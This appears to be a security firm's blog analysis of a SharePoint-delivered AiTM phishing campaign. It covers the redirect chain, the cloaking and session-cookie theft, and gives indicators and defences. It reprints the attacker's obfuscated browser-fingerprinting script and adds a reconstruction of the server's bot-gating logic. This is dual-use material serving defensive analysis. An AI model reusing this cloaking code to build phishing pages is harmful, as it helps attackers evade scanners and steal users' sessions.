We recently intercepted a SharePoint phishing attack targeting a local organization. The attack stood out because of how it abused legitimate services at every step. Microsoft SharePoint delivered the lure. Constant Contact handled the redirect. Even Barracuda’s link protection service got involved. By the time the victim reached the actual phishing page, the URL had passed through three different “trusted” services.
The goal wasn’t just to steal a password. The attackers built an adversary-in-the-middle proxy to capture authenticated sessions. MFA doesn’t help when the attacker steals the session cookie after you’ve already authenticated.
What the Victim Sees
It starts with a SharePoint notification. Nothing unusual. The kind of thing employees see multiple times a day:
[Name] shared a file with you
"Invoice_Document.docx"
[Open] [Download]
The email is legitimate. SPF passes. DKIM is valid. The sender domain is actually sharepoint.com. The attacker created the document directly in Microsoft 365 using a compromised or throwaway account, then shared it through SharePoint’s native sharing feature.
The document itself contains a fake “encrypted document” image with a big blue “VIEW DOCUMENT” button. Clicking it starts the redirect chain.
The Redirect Chain
We traced the URL through three hops before it reached the phishing infrastructure:
SharePoint Document
↓
Constant Contact (rs6.net) // Email marketing platform
↓
Barracuda LinkProtect // URL security scanner
↓
Attacker's Server // AiTM proxy
Each hop adds legitimacy. URL reputation services see domains belonging to Constant Contact and Barracuda and let the traffic through. The attackers are essentially laundering their malicious URL through services that security tools trust.
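Tracing a chain like this by hand is tedious, so here is a rough sketch of the kind of walker we use — it follows Location headers one hop at a time without ever executing JavaScript. The fetch implementation is injectable so the logic can be exercised offline; the URLs in the usage example below are stand-ins, not the real campaign infrastructure.

```javascript
// Sketch: walk a redirect chain hop by hop without executing JavaScript.
// `fetchImpl` is injectable (pass the global fetch on Node 18+ for real use)
// so the walker can be tested offline against a mock.
async function walkRedirects(url, fetchImpl, maxHops = 10) {
  const chain = [url];
  for (let i = 0; i < maxHops; i++) {
    const resp = await fetchImpl(url, { redirect: "manual" });
    const next = resp.headers.get("location");
    // Stop when the server stops redirecting
    if (resp.status < 300 || resp.status >= 400 || !next) break;
    url = new URL(next, url).href; // resolve relative Location headers
    chain.push(url);
  }
  return chain;
}
```

Run against this campaign, a walker like this surfaces every intermediate domain — which is exactly the list you want for blocklists and retro-hunting in proxy logs.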
The Disappearing Phishing Page
When we tried to access the final URL with curl, we got redirected to wix.com. Nothing malicious. We tried wget. Same thing. The phishing page seemed to be gone. It wasn’t. The server was checking who was visiting.
Requesting the page with full browser headers returned something different: a page with nothing but a script tag containing 2KB of obfuscated JavaScript.
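"Full browser headers" means more than just a User-Agent string. A bare curl or wget request is missing the Accept, language, and Sec-Fetch headers every real browser sends, and cloaking servers key on exactly that. The set below is representative of what we replay, not a verbatim capture from this investigation, and the UA string is illustrative.

```javascript
// Sketch: a browser-like header set for replaying suspicious URLs.
// The exact values matter less than looking like a complete browser
// request; default curl/wget headers are an obvious tell.
const BROWSER_HEADERS = {
  "User-Agent":
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " +
    "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
  "Accept":
    "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  "Accept-Language": "en-US,en;q=0.9",
  "Sec-Fetch-Dest": "document",
  "Sec-Fetch-Mode": "navigate",
  "Sec-Fetch-Site": "none",
  "Upgrade-Insecure-Requests": "1",
};

// On Node 18+ this could be replayed as (URL hypothetical):
// const resp = await fetch("https://sso.example.invalid/", { headers: BROWSER_HEADERS });
```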
The Obfuscated Fingerprinting Code
Here’s what the server actually returned:
<script>
(function(q,u,r,g,t,v,w,x){var n={},l={mode:"php",errors:n};
try{function c(b,a){try{l[b]=a()}catch(f){n[b]=f.name}}
function d(b,a){c(b,function(){function f(m){try{var h=a[m];
switch(typeof h){case "object":null!==h&&(h=h.toString());
break;case "function":h=u.prototype.toString.call(h)}e[m]=h}
catch(y){n[b+"."+m]=y.name}}var e={},k;for(k in a)f(k);
try{var p=q.getOwnPropertyNames(a);for(k=0;k<p.length;++k)
f(p[k]);e["!!"]=p}catch(m){}return e})}d("console",r);
d("document",g);d("location",t);d("navigator",v);d("window",x);
d("screen",w);c("timezoneOffset",function(){return(new Date).
getTimezoneOffset()});c("webgl",function(){var b=g.createElement(
"canvas").getContext("webgl"),a=b.getExtension("WEBGL_debug_renderer_info");
return{vendor:b.getParameter(a.UNMASKED_VENDOR_WEBGL),
renderer:b.getParameter(a.UNMASKED_RENDERER_WEBGL)}});/* ... */}
catch(c){}(function(){var c=g.createElement("form"),
d=g.createElement("input");c.method="POST";c.action=t.href;
d.type="hidden";d.name="data";d.value=JSON.stringify(l);
c.appendChild(d);g.body.appendChild(c);c.submit()})()
})(Object,Function,console,document,location,navigator,screen,window);
</script>
Breaking Down the Obfuscation
The function parameters at the end tell us what we’re dealing with:
})(Object, Function, console, document, location, navigator, screen, window);
// q=Object, u=Function, r=console, g=document, t=location, v=navigator, w=screen, x=window
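For a sample this small you can even automate the rename. A word-boundary regex pass is crude — it would happily mangle string literals in a bigger program — but on a 2KB blob with single-letter aliases it gets you to readable code in seconds:

```javascript
// Sketch: a naive rename pass for this specific sample. Word-boundary
// regexes are crude (they would also rewrite matching letters inside
// string literals), but they suffice for a small blob like this one.
const PARAM_MAP = {
  q: "Object", u: "Function", r: "console", g: "document",
  t: "location", v: "navigator", w: "screen", x: "window",
};

function renameParams(src) {
  return Object.entries(PARAM_MAP).reduce(
    (code, [short, full]) =>
      code.replace(new RegExp(`\\b${short}\\b`, "g"), full),
    src
  );
}
```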
The obfuscated variable names map directly to browser globals. Once you make that substitution, the code becomes readable:
// The collection object
var fingerprint = {
mode: "php",
errors: {}
};
// Function 'd' enumerates all properties of an object.
// It captures both enumerable and non-enumerable properties.
function collectObject(obj) {
var result = {};
// Get enumerable properties
for (var key in obj) {
var value = obj[key];
if (typeof value === "object" && value !== null) {
value = value.toString();
} else if (typeof value === "function") {
value = Function.prototype.toString.call(value);
}
result[key] = value;
}
// Also get non-enumerable properties via getOwnPropertyNames
var props = Object.getOwnPropertyNames(obj);
result["!!"] = props; // Store the full property list
return result;
}
// Collect everything
fingerprint.console = collectObject(console);
fingerprint.document = collectObject(document);
fingerprint.location = collectObject(location);
fingerprint.navigator = collectObject(navigator);
fingerprint.screen = collectObject(screen);
fingerprint.window = collectObject(window);
// Timezone offset
fingerprint.timezoneOffset = new Date().getTimezoneOffset();
// WebGL renderer - this is the key bot detection
var canvas = document.createElement("canvas");
var gl = canvas.getContext("webgl");
var debugInfo = gl.getExtension("WEBGL_debug_renderer_info");
fingerprint.webgl = {
vendor: gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL),
renderer: gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)
};
The Auto-Submit Trick
The last part of the script creates a hidden form and immediately submits it:
var form = document.createElement("form");
var input = document.createElement("input");
form.method = "POST";
form.action = location.href; // POST back to the same URL
input.type = "hidden";
input.name = "data";
input.value = JSON.stringify(fingerprint);
form.appendChild(input);
document.body.appendChild(form);
form.submit(); // Sends fingerprint to server automatically
The page loads, JavaScript executes, browser fingerprint gets collected, and the data is immediately POSTed back to the server. The server then decides whether to show the phishing page or redirect to a benign site.
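On the receiving end, the server just has to unpack a standard urlencoded form field and parse the JSON. The real backend is PHP (the blob even labels itself mode:"php"); this is the same parsing step sketched in JavaScript for illustration:

```javascript
// Sketch: what the receiving endpoint does with the auto-submitted form.
// The body is an application/x-www-form-urlencoded string: data=<json>.
function parseFingerprintPost(body) {
  const raw = new URLSearchParams(body).get("data");
  if (raw === null) return null; // not the auto-submitted form
  try {
    return JSON.parse(raw);
  } catch {
    return null; // tampered or truncated payload
  }
}
```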
What the Server Checks
The WebGL renderer check is the primary bot detection. Real browsers report actual GPU information:
| Visitor Type | WebGL Renderer | Server Response |
| --- | --- | --- |
| Real Chrome on Windows | “ANGLE (NVIDIA GeForce GTX 1080…)” | Phishing page |
| Headless Chrome | “SwiftShader” or “Google SwiftShader” | Redirect to wix.com |
| Linux VM / CI runner | “llvmpipe” or “Mesa” | Redirect to wix.com |
| curl / wget / scanner | No JavaScript execution | Redirect to wix.com |
The navigator object check catches navigator.webdriver, which automated browsers set to true. The console object enumeration can reveal whether DevTools has modified console methods. Taken together, these signals let the server reliably distinguish security tools from real victims.
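We didn't recover the server-side code, but the decision it makes with the POSTed fingerprint is easy to infer from the table above. A sketch of that logic — field names follow the collection code earlier; the specific rules are our inference:

```javascript
// Sketch: the gating decision the server likely makes. Renderer strings
// match the table above; exact server-side rules are inferred, not recovered.
const BOT_RENDERERS = ["swiftshader", "llvmpipe", "mesa"];

function isLikelyBot(fp) {
  // No WebGL at all: the collector's try/catch recorded an error instead
  if (!fp.webgl || !fp.webgl.renderer) return true;
  const renderer = fp.webgl.renderer.toLowerCase();
  if (BOT_RENDERERS.some((s) => renderer.includes(s))) return true;
  // Automated browsers expose navigator.webdriver === true
  if (fp.navigator && fp.navigator.webdriver === true) return true;
  return false; // looks like a real victim: serve the phishing page
}
```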
Session Hijacking: Why MFA Doesn’t Help
The “sso” subdomain was the giveaway. This wasn’t a static phishing page that captures credentials and redirects you somewhere. It was a reverse proxy sitting between victims and Microsoft’s real login page.
┌────────────┐ ┌─────────────────────┐ ┌────────────────┐
│ │ │ │ │ │
│ Victim │ ──────► │ Attacker's Proxy │ ──────► │ Microsoft │
│ │ ◄────── │ │ ◄────── │ (Real SSO) │
│ │ │ │ │ │
└────────────┘ └─────────────────────┘ └────────────────┘
│
▼
Captures:
• Username/password
• MFA completion
• Session cookies
The victim sees the actual Microsoft login page. They enter their password. Microsoft sends an MFA push to their phone. They approve it. Microsoft issues an authenticated session cookie. The proxy intercepts that cookie and stores it.
The attacker now has a valid session. They can import that cookie into their own browser and access the victim’s account without ever needing the password or MFA again. The session is already authenticated.
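The reason this works is that a session cookie is a bearer token: the server-side session store is just a token-to-identity map, and the server cannot tell who is presenting the token. A minimal sketch makes the point (names are illustrative, not Microsoft's actual session scheme):

```javascript
// Sketch: why a stolen session cookie is enough. A session store maps
// token -> identity; presenting the token IS the proof of identity.
const sessions = new Map();

function login(user) {
  // Issued only after password + MFA succeed
  const token = "sess-" + Math.random().toString(36).slice(2);
  sessions.set(token, user);
  return token;
}

function authorize(cookieValue) {
  // No re-check of password, MFA, or device on subsequent requests
  return sessions.get(cookieValue) ?? null;
}
```

The victim completes MFA once; from then on, whoever holds the token — victim or attacker, from any machine — is that user as far as the server is concerned.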
This technique is implemented by publicly available, well-documented frameworks such as Evilginx.
Infrastructure Notes
The SSL certificate on the phishing domain was issued 7 days before we intercepted the attack. Attackers routinely spin up fresh domains and certificates to stay ahead of blocklists. Let’s Encrypt makes this trivially easy.
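Certificate age is cheap to check and a useful triage signal. A sketch of the heuristic as a pure function — the notBefore value would come from the certificate itself (for example, the valid_from field of Node's tls.TLSSocket.getPeerCertificate(), which typically parses with Date), and the 30-day threshold is our choice, not a standard:

```javascript
// Sketch: flag domains whose certificate was issued very recently.
// Threshold is a triage heuristic, not a standard.
function certAgeDays(notBefore, now = new Date()) {
  return (now - new Date(notBefore)) / 86400000; // ms per day
}

function isSuspiciouslyFresh(notBefore, now = new Date(), maxDays = 30) {
  return certAgeDays(notBefore, now) < maxDays;
}
```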
Document metadata indicated the lure was created directly in SharePoint using “Microsoft Word for the web” rather than a desktop application. This is likely intentional. Desktop Office applications embed machine-specific metadata (author names, file paths, printer info, revision history) that could trigger detection rules or expose the attacker during forensic analysis. Creating the document entirely in the browser avoids most of that.
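That metadata pattern is detectable. An OOXML .docx is a zip, and its docProps/app.xml carries the Application and Company fields (unzipping is out of scope here). The exact strings Word for the web writes can vary, so treat the values below as examples of the profile rather than a definitive signature:

```javascript
// Sketch: flag the "created in the browser, empty Company" metadata
// profile from the contents of docProps/app.xml. Example strings only.
function matchesWebLureProfile(appXml) {
  const application = (appXml.match(/<Application>([^<]*)<\/Application>/) || [])[1] || "";
  const company = (appXml.match(/<Company>([^<]*)<\/Company>/) || [])[1] || "";
  return /for the web/i.test(application) && company.trim() === "";
}
```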
Takeaways
A few things stood out about this attack:
- Legitimate services at every hop. SharePoint, Constant Contact, Barracuda. Every URL in the chain belonged to a trusted provider.
- The phishing page hides from analysis. Security scanners, headless browsers, and researchers get redirected to a benign site.
- MFA alone doesn’t stop this. The attacker captures the session after MFA is completed. The only defense is phishing-resistant authentication like FIDO2 security keys or passkeys.
- The document came from a real Microsoft domain. “Check the sender” doesn’t help when the email legitimately comes from sharepoint.com.
Traditional security advice assumes phishing emails come from suspicious domains with obvious red flags. This attack had none of those. The delivery mechanism was Microsoft’s own infrastructure.
Indicators of Compromise
We’ve anonymized specific identifiers from this campaign since it targeted a local organization. The techniques and infrastructure patterns are what matter for detection.
URL Patterns
- Constant Contact redirects (*.rs6.net/tn.jsp) pointing to non-Constant Contact destinations
- Barracuda LinkProtect URLs (linkprotect.cudasvc.com) wrapping unknown domains
- Domains with “sso” subdomains not belonging to your organization
Document Indicators
- Office documents created in “Microsoft Word for the web” with empty Company metadata
- Documents with external hyperlinks to tracking/redirect services
- Lure text patterns: “secured”, “encrypted”, “protected document”
Infrastructure
- Recently issued Let’s Encrypt certificates (< 30 days)
- PHP backends on nginx serving minimal HTML with JavaScript fingerprinting
- Servers that return different content based on User-Agent or browser fingerprint
Protect Your Business
The only reliable defense against AiTM attacks is phishing-resistant MFA: FIDO2 security keys, Windows Hello for Business, or passkeys. These methods are cryptographically bound to the legitimate domain and won’t authenticate through a proxy. Pair that with conditional access policies that require compliant devices and block legacy authentication, and you’ve closed the door on this entire attack class.
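The domain binding is the whole trick. During a WebAuthn ceremony the browser itself writes its current origin into the signed clientDataJSON, and the relying party rejects any mismatch — so an assertion performed on the proxy's domain can never verify against the real site. A simplified sketch of that one verification step (real verification also checks the challenge and signature):

```javascript
// Sketch: the origin check that defeats an AiTM proxy. The browser, not
// the page, sets clientData.origin, so a proxy cannot forge it.
function checkClientDataOrigin(clientDataJson, expectedOrigin) {
  const clientData = JSON.parse(clientDataJson);
  return clientData.type === "webauthn.get" && clientData.origin === expectedOrigin;
}
```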
Illini Tech Services can help you get there. Our cybersecurity services include Microsoft 365 conditional access configuration, Defender for Office 365 deployment, and penetration testing to find gaps before attackers do. Our Secure Complete plan adds 24/7 SOC monitoring, advanced phishing protection, security awareness training, and dark web credential monitoring.
Contact Illini Tech Services
217-854-6260
[email protected]